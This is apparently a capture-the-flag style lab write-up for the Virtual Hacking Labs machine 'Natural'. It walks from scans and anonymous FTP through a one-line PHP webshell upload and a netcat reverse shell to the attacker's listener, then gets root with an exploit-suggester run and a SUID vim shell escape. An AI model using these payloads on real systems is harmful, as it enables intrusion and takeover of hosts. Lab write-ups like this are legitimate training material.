WriteupsVHL — Natural
MiscEasyLinux
VHL — Natural
FTP anonymous login exposes web application files. Abused file write via FTP to upload a PHP webshell for initial access.
February 12, 2025Virtual Hacking Labs
#FTP#Anonymous Login#Web Shell#PHP
nmap
sh
nmap -sC -sV -T4 -A -Pn -p- --open 10.11.1.77
Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-02-12 21:14 EST
Nmap scan report for 10.11.1.77
Host is up (0.022s latency).
Not shown: 65528 closed tcp ports (reset), 2 filtered tcp ports (no-response)
Some closed ports may be reported as filtered due to --defeat-rst-ratelimit
PORT STATE SERVICE VERSION
21/tcp open ftp vsftpd 2.2.2
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
|_drwxr-xr-x 2 0 0 4096 Mar 22 2017 pub
| ftp-syst:
| STAT:
| FTP server status:
| Connected to 172.16.1.1
| Logged in as ftp
| TYPE: ASCII
| No session bandwidth limit
| Session timeout in seconds is 300
| Control connection is plain text
| Data connections will be plain text
| At session startup, client count was 2
| vsFTPd 2.2.2 - secure, fast, stable
|_End of status
22/tcp open ssh OpenSSH 5.3 (protocol 2.0)
| ssh-hostkey:
| 1024 68:6a:dc:e1:41:57:e1:0d:07:d6:69:cd:6f:da:17:bf (DSA)
|_ 2048 ae:8d:d1:b5:ed:d3:e1:52:6b:d6:f7:95:ff:39:5d:e5 (RSA)
80/tcp open http Apache httpd 2.2.15 ((CentOS))
|_http-server-header: Apache/2.2.15 (CentOS)
|_http-title: Natural Design & Development - Home
| http-methods:
|_ Potentially risky methods: TRACE
443/tcp open ssl/http Apache httpd 2.2.15 ((CentOS))
|_http-title: Natural Design & Development - Home
|_ssl-date: 2025-02-13T02:14:36+00:00; +3s from scanner time.
| ssl-cert: Subject: commonName=natural/organizationName=SomeOrganization/stateOrProvinceName=SomeState/countryName=--
| Not valid before: 2017-10-02T15:23:02
|_Not valid after: 2018-10-02T15:23:02
|_http-server-header: Apache/2.2.15 (CentOS)
| http-methods:
|_ Potentially risky methods: TRACE
46904/tcp open status 1 (RPC #100024)
Device type: general purpose
Running: Linux 2.6.X
OS CPE: cpe:/o:linux:linux_kernel:2.6.32
OS details: Linux 2.6.32
Network Distance: 2 hops
Service Info: OS: Unix
Host script results:
|_clock-skew: 2s
TRACEROUTE
HOP RTT ADDRESS
1 21.61 ms 10.11.1.77
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 26.04 seconds
21
sh
21/tcp open ftp vsftpd 2.2.2
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
|_drwxr-xr-x 2 0 0 4096 Mar 22 2017 pub
| ftp-syst:
| STAT:
| FTP server status:
| Connected to 172.16.1.1
| Logged in as ftp
| TYPE: ASCII
| No session bandwidth limit
| Session timeout in seconds is 300
| Control connection is plain text
| Data connections will be plain text
| At session startup, client count was 2
| vsFTPd 2.2.2 - secure, fast, stable
|_End of statussh
ftp anonymous@10.11.1.77
Connected to 10.11.1.77.
220 (vsFTPd 2.2.2)
331 Please specify the password.
Password:
230 Login successful.
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> ls
229 Entering Extended Passive Mode (|||42671|).
150 Here comes the directory listing.
drwxr-xr-x 2 0 0 4096 Mar 22 2017 pub80
sh
80/tcp open http Apache httpd 2.2.15 ((CentOS))
|_http-server-header: Apache/2.2.15 (CentOS)
|_http-title: Natural Design & Development - Home
| http-methods:
|_ Potentially risky methods: TRACEdirectory search
sh
feroxbuster --url http://10.11.1.77/
___ ___ __ __ __ __ __ ___
|__ |__ |__) |__) | / ` / \ \_/ | | \ |__
| |___ | \ | \ | \__, \__/ / \ | |__/ |___
by Ben "epi" Risher 🤓 ver: 2.10.3
───────────────────────────┬──────────────────────
🎯 Target Url │ http://10.11.1.77/
🚀 Threads │ 50
📖 Wordlist │ /usr/share/seclists/Discovery/Web-Content/raft-medium-directories.txt
👌 Status Codes │ All Status Codes!
💥 Timeout (secs) │ 7
🦡 User-Agent │ feroxbuster/2.10.3
💉 Config File │ /etc/feroxbuster/ferox-config.toml
🔎 Extract Links │ true
🏁 HTTP methods │ [GET]
🔃 Recursion Depth │ 4
🎉 New Version Available │ https://github.com/epi052/feroxbuster/releases/latest
───────────────────────────┴──────────────────────
🏁 Press [ENTER] to use the Scan Management Menu™
──────────────────────────────────────────────────
403 GET 10l 30w -c Auto-filtering found 404-like response and created new filter; toggle off with --dont-filter
404 GET 9l 32w -c Auto-filtering found 404-like response and created new filter; toggle off with --dont-filter
200 GET 1l 12w 1310c http://10.11.1.77/assets/img/favicon.ico
200 GET 268l 659w 10342c http://10.11.1.77/portfolio.html
200 GET 148l 383w 6625c http://10.11.1.77/contact.php
200 GET 7l 389w 38808c http://10.11.1.77/assets/js/jquery-ui-1.12.1.custom.min.js
200 GET 7l 641w 46653c http://10.11.1.77/assets/js/bootstrap.min.js
200 GET 51l 96w 1186c http://10.11.1.77/assets/css/nucleo-icons.css
200 GET 4l 66w 31000c http://10.11.1.77/assets/css/fa/css/font-awesome.min.css
200 GET 253l 893w 13457c http://10.11.1.77/aboutus.html
200 GET 340l 765w 9991c http://10.11.1.77/assets/js/pk.js
200 GET 275l 867w 13351c http://10.11.1.77/index.html
200 GET 1l 428w 24632c http://10.11.1.77/assets/js/tether.min.js
200 GET 4l 1298w 86659c http://10.11.1.77/assets/js/jquery-3.2.1.min.js
200 GET 6l 1643w 150997c http://10.11.1.77/assets/css/bootstrap.min.css
301 GET 9l 28w 310c http://10.11.1.77/uploads => http://10.11.1.77/uploads/
200 GET 214l 1152w 119081c http://10.11.1.77/assets/img/faces/john.jpg
301 GET 9l 28w 309c http://10.11.1.77/assets => http://10.11.1.77/assets/
200 GET 334l 2555w 291085c http://10.11.1.77/assets/img/faces/sophia.jpg
200 GET 10200l 23484w 234993c http://10.11.1.77/assets/css/pk.css
200 GET 451l 2517w 347721c http://10.11.1.77/assets/img/faces/crystal.jpg
200 GET 132l 558w 57774c http://10.11.1.77/assets/img/sections/18586.jpg
200 GET 151l 996w 125936c http://10.11.1.77/assets/img/sections/66942.jpg
200 GET 620l 3249w 257399c http://10.11.1.77/assets/img/sections/99592236.jpg
200 GET 275l 867w 13351c http://10.11.1.77/
200 GET 981l 1914w 132045c http://10.11.1.77/assets/img/sections/contact.jpg
200 GET 7l 1089w 51465c http://10.11.1.77/assets/js/moment.min.js
200 GET 113l 561w 55265c http://10.11.1.77/assets/img/sections/553942.jpg
200 GET 689l 2081w 22480c http://10.11.1.77/assets/js/bootstrap-tagsinput.js
200 GET 10l 138w 14920c http://10.11.1.77/assets/js/bootstrap-switch.min.js
200 GET 4l 66w 31000c http://10.11.1.77/assets/css/font-awesome.min.css
200 GET 2146l 8074w 58285c http://10.11.1.77/assets/js/nouislider.js
200 GET 6l 161w 16780c http://10.11.1.77/assets/js/jasny-bootstrap.min.js
200 GET 159l 373w 7509c http://10.11.1.77/assets/js/demo.js
200 GET 1897l 6193w 69944c http://10.11.1.77/assets/js/bootstrap-select.js
200 GET 492l 2096w 35145c http://10.11.1.77/assets/fonts/nucleo-icons.eot
200 GET 84l 467w 35945c http://10.11.1.77/assets/fonts/nucleo-icons.woff
200 GET 492l 2095w 34947c http://10.11.1.77/assets/fonts/nucleo-icons.ttf
200 GET 78l 442w 31090c http://10.11.1.77/assets/fonts/nucleo-icons.woff2
200 GET 73l 461w 44937c http://10.11.1.77/assets/img/sections/26578.jpg
200 GET 474l 2096w 148015c http://10.11.1.77/assets/img/sections/8384.jpg
200 GET 732l 3967w 472131c http://10.11.1.77/assets/img/sections/5726578.jpg
200 GET 136l 826w 75817c http://10.11.1.77/assets/img/sections/55469.jpg
200 GET 287l 1585w 229678c http://10.11.1.77/assets/img/sections/55369.jpg
404 GET 9l 33w 286c http://10.11.1.77/Reports%20List
404 GET 9l 33w 288c http://10.11.1.77/external%20files
404 GET 9l 33w 287c http://10.11.1.77/Style%20Library
404 GET 9l 33w 284c http://10.11.1.77/modern%20mom
404 GET 9l 34w 289c http://10.11.1.77/neuf%20giga%20photo
404 GET 9l 33w 288c http://10.11.1.77/Web%20References
404 GET 9l 33w 284c http://10.11.1.77/My%20Project
404 GET 9l 33w 284c http://10.11.1.77/Contact%20Us
404 GET 9l 33w 285c http://10.11.1.77/Donate%20Cash
404 GET 9l 33w 283c http://10.11.1.77/Home%20Page
404 GET 9l 33w 288c http://10.11.1.77/Planned%20Giving
404 GET 9l 33w 288c http://10.11.1.77/Press%20Releases
404 GET 9l 33w 288c http://10.11.1.77/Privacy%20Policy
404 GET 9l 33w 282c http://10.11.1.77/Site%20Map
404 GET 9l 33w 282c http://10.11.1.77/About%20Us
404 GET 9l 33w 286c http://10.11.1.77/Bequest%20Gift
404 GET 9l 33w 283c http://10.11.1.77/Gift%20Form
404 GET 9l 34w 290c http://10.11.1.77/Life%20Income%20Gift
404 GET 9l 33w 284c http://10.11.1.77/New%20Folder
404 GET 9l 33w 285c http://10.11.1.77/Site%20Assets
404 GET 9l 34w 285c http://10.11.1.77/What%20is%20New
[####################] - 41s 30088/30088 0s found:63 errors:0
[####################] - 41s 30000/30000 740/s http://10.11.1.77/
[####################] - 2s 30000/30000 17094/s http://10.11.1.77/assets/css/ => Directory listing
[####################] - 1s 30000/30000 44183/s http://10.11.1.77/assets/img/ => Directory listing
[####################] - 3s 30000/30000 11169/s http://10.11.1.77/assets/img/sections/ => Directory listing
[####################] - 2s 30000/30000 17483/s http://10.11.1.77/assets/js/ => Directory listing
[####################] - 2s 30000/30000 17241/s http://10.11.1.77/assets/img/faces/ => Directory listing
[####################] - 1s 30000/30000 21552/s http://10.11.1.77/assets/css/fa/ => Directory listing
[####################] - 1s 30000/30000 28736/s http://10.11.1.77/assets/ => Directory listing
[####################] - 0s 30000/30000 157895/s http://10.11.1.77/uploads/ => Directory listing
[####################] - 1s 30000/30000 39735/s http://10.11.1.77/assets/fonts/ => Directory listingfile upload
.pdf.php> add double extension<?php system($_GET[0]);?>
- access the payload in
/uploads
reverse shell as apache
BURP
GET /uploads/dummy.pdf.php?0=busybox+nc+172.16.1.1+1234+-e+bash HTTP/1.1sh
nc -lnvp 1234
listening on [any] 1234 ...
connect to [172.16.1.1] from (UNKNOWN) [10.11.1.77] 37341
whoami
apachesh
python -c 'import pty; pty.spawn("/bin/bash")'sh
bash-4.1$ uname -a
uname -a
Linux natural 2.6.32-696.10.3.el6.i686 #1 SMP Tue Sep 26 17:34:41 UTC 2017 i686 i686 i386 GNU/Linuxlinux exploit suggester
sh
bash-4.1$ ./linux-exploit-suggester.sh
./linux-exploit-suggester.sh
Available information:
Kernel version: 2.6.32
Architecture: i386
Distribution: RHEL
Distribution version: N/A
Additional checks (CONFIG_*, sysctl entries, custom Bash commands): performed
Package listing: from current OS
Searching among:
81 kernel space exploits
49 user space exploits
Possible Exploits:
[+] [CVE-2016-5195] dirtycow
Details: https://github.com/dirtycow/dirtycow.github.io/wiki/VulnerabilityDetails
Exposure: probable
Tags: debian=7|8,RHEL=5{kernel:2.6.(18|24|33)-*},RHEL=6{kernel:2.6.32-*|3.(0|2|6|8|10).*|2.6.33.9-rt31},RHEL=7{kernel:3.10.0-*|4.2.0-0.21.el7},ubuntu=16.04|14.04|12.04
Download URL: https://www.exploit-db.com/download/40611
Comments: For RHEL/CentOS see exact vulnerable versions here: https://access.redhat.com/sites/default/files/rh-cve-2016-5195_5.sh
[+] [CVE-2016-5195] dirtycow 2
Details: https://github.com/dirtycow/dirtycow.github.io/wiki/VulnerabilityDetails
Exposure: probable
Tags: debian=7|8,RHEL=5|6|7,ubuntu=14.04|12.04,ubuntu=10.04{kernel:2.6.32-21-generic},ubuntu=16.04{kernel:4.4.0-21-generic}
Download URL: https://www.exploit-db.com/download/40839
ext-url: https://www.exploit-db.com/download/40847
Comments: For RHEL/CentOS see exact vulnerable versions here: https://access.redhat.com/sites/default/files/rh-cve-2016-5195_5.sh
[+] [CVE-2022-32250] nft_object UAF (NFT_MSG_NEWSET)
Details: https://research.nccgroup.com/2022/09/01/settlers-of-netlink-exploiting-a-limited-uaf-in-nf_tables-cve-2022-32250/
https://blog.theori.io/research/CVE-2022-32250-linux-kernel-lpe-2022/
Exposure: less probable
Tags: ubuntu=(22.04){kernel:5.15.0-27-generic}
Download URL: https://raw.githubusercontent.com/theori-io/CVE-2022-32250-exploit/main/exp.c
Comments: kernel.unprivileged_userns_clone=1 required (to obtain CAP_NET_ADMIN)
[+] [CVE-2021-4034] PwnKit
Details: https://www.qualys.com/2022/01/25/cve-2021-4034/pwnkit.txt
Exposure: less probable
Tags: ubuntu=10|11|12|13|14|15|16|17|18|19|20|21,debian=7|8|9|10|11,fedora,manjaro
Download URL: https://codeload.github.com/berdav/CVE-2021-4034/zip/main
[+] [CVE-2021-3156] sudo Baron Samedit
Details: https://www.qualys.com/2021/01/26/cve-2021-3156/baron-samedit-heap-based-overflow-sudo.txt
Exposure: less probable
Tags: mint=19,ubuntu=18|20, debian=10
Download URL: https://codeload.github.com/blasty/CVE-2021-3156/zip/main
[+] [CVE-2021-3156] sudo Baron Samedit 2
Details: https://www.qualys.com/2021/01/26/cve-2021-3156/baron-samedit-heap-based-overflow-sudo.txt
Exposure: less probable
Tags: centos=6|7|8,ubuntu=14|16|17|18|19|20, debian=9|10
Download URL: https://codeload.github.com/worawit/CVE-2021-3156/zip/main
[+] [CVE-2021-22555] Netfilter heap out-of-bounds write
Details: https://google.github.io/security-research/pocs/linux/cve-2021-22555/writeup.html
Exposure: less probable
Tags: ubuntu=20.04{kernel:5.8.0-*}
Download URL: https://raw.githubusercontent.com/google/security-research/master/pocs/linux/cve-2021-22555/exploit.c
ext-url: https://raw.githubusercontent.com/bcoles/kernel-exploits/master/CVE-2021-22555/exploit.c
Comments: ip_tables kernel module must be loaded
[+] [CVE-2019-18634] sudo pwfeedback
Details: https://dylankatz.com/Analysis-of-CVE-2019-18634/
Exposure: less probable
Tags: mint=19
Download URL: https://github.com/saleemrashid/sudo-cve-2019-18634/raw/master/exploit.c
Comments: sudo configuration requires pwfeedback to be enabled.
[+] [CVE-2017-6074] dccp
Details: http://www.openwall.com/lists/oss-security/2017/02/22/3
Exposure: less probable
Tags: ubuntu=(14.04|16.04){kernel:4.4.0-62-generic}
Download URL: https://www.exploit-db.com/download/41458
Comments: Requires Kernel be built with CONFIG_IP_DCCP enabled. Includes partial SMEP/SMAP bypass
[+] [CVE-2017-1000370,CVE-2017-1000371] linux_offset2lib
Details: https://www.qualys.com/2017/06/19/stack-clash/stack-clash.txt
Exposure: less probable
Download URL: https://www.qualys.com/2017/06/19/stack-clash/linux_offset2lib.c
Comments: Uses "Stack Clash" technique
[+] [CVE-2017-1000367] sudopwn
Details: https://www.sudo.ws/alerts/linux_tty.html
Exposure: less probable
Download URL: https://raw.githubusercontent.com/c0d3z3r0/sudo-CVE-2017-1000367/master/sudopwn.c
Comments: Needs to be sudoer. Works only on SELinux enabled systems
[+] [CVE-2017-1000367] Sudoer-to-root
Details: https://www.sudo.ws/alerts/linux_tty.html
Exposure: less probable
Tags: RHEL=7{sudo:1.8.6p7}
Download URL: https://www.qualys.com/2017/05/30/cve-2017-1000367/linux_sudo_cve-2017-1000367.c
Comments: Needs to be sudoer. Works only on SELinux enabled systems
[+] [CVE-2017-1000366,CVE-2017-1000371] linux_ldso_dynamic
Details: https://www.qualys.com/2017/06/19/stack-clash/stack-clash.txt
Exposure: less probable
Tags: debian=9|10,ubuntu=14.04.5|16.04.2|17.04,fedora=23|24|25
Download URL: https://www.qualys.com/2017/06/19/stack-clash/linux_ldso_dynamic.c
Comments: Uses "Stack Clash" technique, works against most SUID-root PIEs
[+] [CVE-2017-1000366,CVE-2017-1000370] linux_ldso_hwcap
Details: https://www.qualys.com/2017/06/19/stack-clash/stack-clash.txt
Exposure: less probable
Download URL: https://www.qualys.com/2017/06/19/stack-clash/linux_ldso_hwcap.c
Comments: Uses "Stack Clash" technique, works against most SUID-root binaries
[+] [CVE-2016-6663,CVE-2016-6664|CVE-2016-6662] mysql-exploit-chain
Details: https://legalhackers.com/advisories/MySQL-Maria-Percona-PrivEscRace-CVE-2016-6663-5616-Exploit.html
Exposure: less probable
Tags: ubuntu=16.04.1
Download URL: http://legalhackers.com/exploits/CVE-2016-6663/mysql-privesc-race.c
Comments: Also MariaDB ver<10.1.18 and ver<10.0.28 affected
[+] [CVE-2015-5287] abrt/sosreport-rhel7
Details: https://www.openwall.com/lists/oss-security/2015/12/01/1
Exposure: less probable
Tags: RHEL=7{abrt:2.1.11-12.el7}
Download URL: https://www.openwall.com/lists/oss-security/2015/12/01/1/1
[+] [CVE-2015-3315] raceabrt
Details: http://seclists.org/oss-sec/2015/q2/130
Exposure: less probable
Tags: fedora=19{abrt:2.1.5-1.fc19},fedora=20{abrt:2.2.2-2.fc20},fedora=21{abrt:2.3.0-3.fc21},RHEL=7{abrt:2.1.11-12.el7}
Download URL: https://gist.githubusercontent.com/taviso/fe359006836d6cd1091e/raw/32fe8481c434f8cad5bcf8529789231627e5074c/raceabrt.c
[+] [CVE-2015-3246] userhelper
Details: https://www.qualys.com/2015/07/23/cve-2015-3245-cve-2015-3246/cve-2015-3245-cve-2015-3246.txt
Exposure: less probable
Tags: RHEL=6{libuser:0.56.13-(4|5).el6},RHEL=6{libuser:0.60-5.el7},fedora=13|19|20|21|22
Download URL: https://www.exploit-db.com/download/37706
Comments: RHEL 5 is also vulnerable, but installed version of glibc (2.5) lacks functions needed by roothelper.c
[+] [CVE-2015-1862] newpid (abrt)
Details: http://openwall.com/lists/oss-security/2015/04/14/4
Exposure: less probable
Tags: fedora=20
Download URL: https://gist.githubusercontent.com/taviso/0f02c255c13c5c113406/raw/eafac78dce51329b03bea7167f1271718bee4dcc/newpid.c
[+] [CVE-2014-5119] __gconv_translit_find
Details: http://googleprojectzero.blogspot.com/2014/08/the-poisoned-nul-byte-2014-edition.html
Exposure: less probable
Tags: debian=6
Download URL: https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/34421.tar.gz
[+] [CVE-2014-0196] rawmodePTY
Details: http://blog.includesecurity.com/2014/06/exploit-walkthrough-cve-2014-0196-pty-kernel-race-condition.html
Exposure: less probable
Download URL: https://www.exploit-db.com/download/33516
[+] [CVE-2013-2094] semtex
Details: http://timetobleed.com/a-closer-look-at-a-recent-privilege-escalation-bug-in-linux-cve-2013-2094/
Exposure: less probable
Tags: RHEL=6
Download URL: https://www.exploit-db.com/download/25444
[+] [CVE-2013-0268] msr
Details: https://www.exploit-db.com/exploits/27297/
Exposure: less probable
Download URL: https://www.exploit-db.com/download/27297
[+] [CVE-2012-0056,CVE-2010-3849,CVE-2010-3850] full-nelson
Details: http://vulnfactory.org/exploits/full-nelson.c
Exposure: less probable
Tags: ubuntu=(9.10|10.10){kernel:2.6.(31|35)-(14|19)-(server|generic)},ubuntu=10.04{kernel:2.6.32-(21|24)-server}
Download URL: http://vulnfactory.org/exploits/full-nelson.c
[+] [CVE-2011-1485] pkexec
Details: https://www.exploit-db.com/exploits/17942/
Exposure: less probable
Tags: RHEL=6,ubuntu=10.04|10.10
Download URL: https://www.exploit-db.com/download/17942
[+] [CVE-2010-4347] american-sign-language
Details: https://www.exploit-db.com/exploits/15774/
Exposure: less probable
Download URL: https://www.exploit-db.com/download/15774
[+] [CVE-2010-3904] rds
Details: http://www.securityfocus.com/archive/1/514379
Exposure: less probable
Tags: debian=6.0{kernel:2.6.(31|32|34|35)-(1|trunk)-amd64},ubuntu=10.10|9.10,fedora=13{kernel:2.6.33.3-85.fc13.i686.PAE},ubuntu=10.04{kernel:2.6.32-(21|24)-generic}
Download URL: http://web.archive.org/web/20101020044048/http://www.vsecurity.com/download/tools/linux-rds-exploit.c
[+] [CVE-2010-3848,CVE-2010-3850,CVE-2010-4073] half_nelson
Details: https://www.exploit-db.com/exploits/17787/
Exposure: less probable
Tags: ubuntu=(10.04|9.10){kernel:2.6.(31|32)-(14|21)-server}
Download URL: https://www.exploit-db.com/download/17787
[+] [CVE-2010-3437] pktcdvd
Details: https://www.exploit-db.com/exploits/15150/
Exposure: less probable
Tags: ubuntu=10.04
Download URL: https://www.exploit-db.com/download/15150
[+] [CVE-2010-3301] ptrace_kmod2
Details: https://www.exploit-db.com/exploits/15023/
Exposure: less probable
Tags: debian=6.0{kernel:2.6.(32|33|34|35)-(1|2|trunk)-amd64},ubuntu=(10.04|10.10){kernel:2.6.(32|35)-(19|21|24)-server}
Download URL: https://www.exploit-db.com/download/15023
[+] [CVE-2010-3081] video4linux
Details: https://www.exploit-db.com/exploits/15024/
Exposure: less probable
Tags: RHEL=5
Download URL: https://www.exploit-db.com/download/15024
[+] [CVE-2010-2959] can_bcm
Details: https://www.exploit-db.com/exploits/14814/
Exposure: less probable
Tags: ubuntu=10.04{kernel:2.6.32-24-generic}
Download URL: https://www.exploit-db.com/download/14814
[+] [CVE-2010-1146] reiserfs
Details: https://jon.oberheide.org/blog/2010/04/10/reiserfs-reiserfs_priv-vulnerability/
Exposure: less probable
Tags: ubuntu=9.10
Download URL: https://jon.oberheide.org/files/team-edward.py
linpeas
sh
╔══════════╣ Operative system
╚ https://book.hacktricks.xyz/linux-hardening/privilege-escalation#kernel-exploits
Linux version 2.6.32-696.10.3.el6.i686 (mockbuild@c1bl.rdu2.centos.org) (gcc version 4.4.7 20120313 (Red Hat 4.4.7-18) (GCC) ) #1 SMP Tue Sep 26 17:34:41 UTC 2017
LSB Version: :base-4.0-ia32:base-4.0-noarch:core-4.0-ia32:core-4.0-noarch:graphics-4.0-ia32:graphics-4.0-noarch:printing-4.0-ia32:printing-4.0-noarch
Distributor ID: CentOS
Description: CentOS release 6.9 (Final)
Release: 6.9
Codename: Final
╔══════════╣ Sudo version
╚ https://book.hacktricks.xyz/linux-hardening/privilege-escalation#sudo-version
Sudo version 1.8.6p3sh
╔══════════╣ Useful software
/usr/bin/base64
/usr/bin/curl
/usr/bin/gdb
/usr/bin/make
/usr/bin/perl
/usr/bin/php
/bin/ping
/usr/bin/python
/usr/bin/python2
/usr/bin/python2.6
/usr/bin/sudo
/usr/bin/wget
╔══════════╣ Installed Compilers
╔══════════╣ MySQL version
mysql Ver 14.14 Distrib 5.1.73, for redhat-linux-gnu (i386) using readline 5.1sh
╚════════════════════════════════════╝
╔══════════╣ SUID - Check easy privesc, exploits and write perms
╚ https://book.hacktricks.xyz/linux-hardening/privilege-escalation#sudo-and-suid
-rwsr-x--- 1 root dbus 49K Apr 22 2015 /lib/dbus-1/dbus-daemon-launch-helper
-r-sr-xr-x 1 root root 14K Oct 4 2017 /usr/lib/vmware-tools/bin64/vmware-user-suid-wrapper
-r-sr-xr-x 1 root root 9.4K Oct 4 2017 /usr/lib/vmware-tools/bin32/vmware-user-suid-wrapper
-rwsr-xr-x. 1 root root 35K May 10 2016 /usr/bin/newgrp ---> HP-UX_10.20
-rwsr-xr-x. 1 root root 73K May 10 2016 /usr/bin/gpasswd
---s--x--x. 1 root root 124K Jun 22 2017 /usr/bin/sudo ---> check_if_the_sudo_version_is_vulnerable
-rwsr-xr-x. 1 root root 18K Mar 17 2015 /usr/bin/pkexec ---> Linux4.10_to_5.1.17(CVE-2019-13272)/rhel_6(CVE-2011-1485)
-rws--x--x. 1 root root 17K Mar 22 2017 /usr/bin/chfn ---> SuSE_9.3/10
---s--x---. 1 root stapusr 174K Mar 22 2017 /usr/bin/staprun
-rws--x--x. 1 root root 16K Mar 22 2017 /usr/bin/chsh
-rwsr-xr-x. 1 root root 68K May 10 2016 /usr/bin/chage
-rwsr-xr-x. 1 root root 50K Mar 21 2017 /usr/bin/at ---> RTru64_UNIX_4.0g(CVE-2002-1614)
-rwsr-xr-x. 1 root root 58K Mar 22 2017 /usr/bin/ksu
-rwsr-xr-x. 1 root root 46K Aug 23 2016 /usr/bin/crontab
-rwsr-xr-x. 1 root root 26K Nov 23 2015 /usr/bin/passwd ---> Apple_Mac_OSX(03-2006)/Solaris_8/9(12-2004)/SPARC_8/9/Sun_Solaris_2.3_to_2.5.1(02-1997)
-rws--x--x. 1 root root 13K Jun 19 2017 /usr/libexec/pt_chown ---> GNU_glibc_2.1/2.1.1_-6(08-1999)
-rwsr-xr-x. 1 root root 9.4K Mar 17 2015 /usr/libexec/polkit-1/polkit-agent-helper-1
-rwsr-xr-x. 1 root root 251K Aug 31 2017 /usr/libexec/openssh/ssh-keysign
-rwsr-xr-x. 1 abrt abrt 9.4K Mar 23 2017 /usr/libexec/abrt-action-install-debuginfo-to-abrt-cache ---> CENTOS
-r-s--x---. 1 root apache 11K Aug 15 2017 /usr/sbin/suexec
-rwsr-xr-x. 1 root root 6.9K May 30 2017 /usr/sbin/usernetctl
-rws--x--x 1 root root 36K Aug 22 2010 /usr/sbin/userhelper
-rwsr-xr-x. 1 root root 32K Mar 22 2017 /bin/ping6
-rwsr-xr-x. 1 root root 34K Mar 22 2017 /bin/su
-rwsr-xr-x. 1 root root 76K Mar 22 2017 /bin/mount ---> Apple_Mac_OSX(Lion)_Kernel_xnu-1699.32.7_except_xnu-1699.24.8
-rwsr-xr-x 1 root root 2.1M Oct 2 2017 /bin/backdoor (Unknown SUID binary!)
-rwsr-xr-x. 1 root root 50K Mar 22 2017 /bin/umount ---> BSD/Linux(08-1996)
-rwsr-xr-x. 1 root root 36K Mar 22 2017 /bin/ping
-rwsr-xr-x. 1 root root 9.4K Mar 22 2017 /sbin/pam_timestamp_check
-rwsr-xr-x. 1 root root 34K Mar 22 2017 /sbin/unix_chkpwd
-rwsr-xr-x. 1 root root 120K Mar 22 2017 /sbin/mount.nfsSUID (/bin/backdoor) VIM
- https://gtfobins.github.io/gtfobins/vim/#suid
sh
-rwsr-xr-x 1 root root 2.1M Oct 2 2017 /bin/backdoor (Unknown SUID binary!)sh
bash-4.1$ /bin/backdoor --help
/bin/backdoor --help
VIM - Vi IMproved 7.4 (2013 Aug 10, compiled Dec 21 2016 17:06:34)
usage: vim [arguments] [file ..] edit specified file(s)
or: vim [arguments] - read text from stdin
or: vim [arguments] -t tag edit file where tag is defined
or: vim [arguments] -q [errorfile] edit file with first errorsh
/bin/backdoor -c ':py import os; os.execl("/bin/sh", "sh", "-pc", "reset; exec sh -p")'sh
sh-4.1# whoami
whoami
root
sh-4.1# cat /root/key.txt
cat /root/key.txt
tutvxmoli5yun0zcqmq9
sh-4.1# date
date
Wed Feb 12 21:41:25 EST 2025
Up next
EasyFeb 2025
VHL — Trails
Hiking Trails web application on Ubuntu. Directory traversal and file inclusion vulnerabilities lead to credentials and shell.
Read writeup
EasyFeb 2025
VHL — Anthony
Windows 7 SP1 with Apache and multiple services. Enumerated web application vulnerabilities and exploited weak credentials for admin access.
Read writeup
EasyFeb 2025
VHL — Jennifer
Windows with FileZilla FTP and CMS Mini web app. FTP credential exposure and CMS RCE via file upload for initial foothold.
Read writeup